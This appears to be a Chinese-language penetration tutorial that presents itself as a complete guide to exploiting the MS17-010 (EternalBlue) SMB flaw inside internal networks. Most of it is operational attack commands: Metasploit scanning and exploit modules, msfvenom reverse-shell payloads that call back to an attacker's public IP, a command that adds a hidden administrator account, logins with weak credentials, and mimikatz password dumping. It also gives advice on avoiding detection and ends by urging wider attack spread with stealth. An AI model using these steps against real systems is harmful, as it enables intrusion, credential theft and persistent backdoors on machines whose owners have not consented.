内网渗透之ms17-010
字数 1059 2025-08-18 11:38:48
MS17-010 (永恒之蓝)漏洞利用完全指南
一、漏洞概述
MS17-010是微软Windows SMB服务中的一个严重漏洞,影响Windows XP到Windows 10/Server 2016等多个版本。该漏洞允许远程攻击者在目标系统上执行任意代码,是内网渗透中常用的攻击手段。
二、环境准备
1. 工具准备
- Metasploit Framework
- 方程式漏洞利用工具(替代fb.py的简化工具)
- 网安永恒之蓝检测工具
- ew代理工具(用于内网穿透)
2. MSF模块
auxiliary/scanner/smb/smb_ms17_010 # 漏洞检测
exploit/windows/smb/ms17_010_eternalblue # 直接利用
exploit/windows/smb/ms17_010_psexec # 通过凭证利用
auxiliary/admin/smb/ms17_010_command # 执行系统命令
三、漏洞检测
1. 使用MSF检测
use auxiliary/scanner/smb/smb_ms17_010
set rhosts 192.168.100.40-50
set threads 3
run
四、直接利用(eternalblue)
1. 基本利用方法
use exploit/windows/smb/ms17_010_eternalblue
set payload windows/x64/meterpreter/reverse_tcp
set rhost 192.168.100.46
set lhost [公网IP]
run
2. 常见问题
- Session不稳定:容易died
- 利用耗时:执行时间较长
- 成功率低:可能无法成功获取session
3. 替代方案(bind_tcp)
set payload windows/x64/meterpreter/bind_tcp
注意:容易被防火墙和杀毒软件发现
五、方程式漏洞利用工具
1. 工具优势
- 比MSF模块更稳定
- 成功率更高
- 操作更简便
2. 使用步骤
对于Windows Server 2008(x64)
- 生成payload:
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=公网IP LPORT=12345 -f dll > x64.dll
-
替换工具中的x64.dll文件
-
MSF监听:
use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set lport 12345
set lhost 公网IP
run
- 在工具中设置目标IP,依次点击Eternalblue、Doublepulsar的Attack
对于Windows Server 2003(x86)
- 生成payload:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=公网IP LPORT=12345 -f dll > x86.dll
-
替换工具中的x86.dll文件
-
MSF监听:
set payload windows/meterpreter/reverse_tcp
六、替代利用方法
1. 通过命令添加用户
use auxiliary/admin/smb/ms17_010_command
set COMMAND "net user hacker P@ssw0rd /add && net localgroup administrators hacker /add"
set RHOSTS 192.168.100.2
run
2. 使用凭证建立会话
use exploit/windows/smb/ms17_010_psexec
set rhosts 192.168.100.2
set SMBUser guest
set SMBPass 123456
run
七、后渗透操作
1. 基本信息收集
getuid
run post/windows/gather/checkvm
2. 进程迁移(提高稳定性)
run post/windows/manage/migrate
3. 密码抓取
load mimikatz
mimikatz_command -f sekurlsa::searchPasswords
八、注意事项
-
Windows Server 2003:
- 多次执行可能导致系统蓝屏
- 成功率不稳定
- 建议优先使用添加用户+凭证登录的方式
-
稳定性问题:
- eternalblue获取的session容易died
- 方程式工具获取的session更稳定
-
检测规避:
- bind_tcp方式容易被防火墙/杀软发现
- 优先使用reverse_tcp方式
-
内网穿透:
- 通过ew等代理工具进入内网
- 在跳板机上传漏洞利用工具
九、参考资源
- [利用公网Msf+MS17010跨网段攻击内网]
- [萌新初试MS17-010方程式漏洞]
- Tide安全团队官网: http://www.TideSec.net
通过以上方法,可以有效地利用MS17-010漏洞进行内网渗透,获取系统权限并进一步扩大攻击范围。实际操作中应根据目标环境选择合适的利用方式,并注意操作的稳定性和隐蔽性。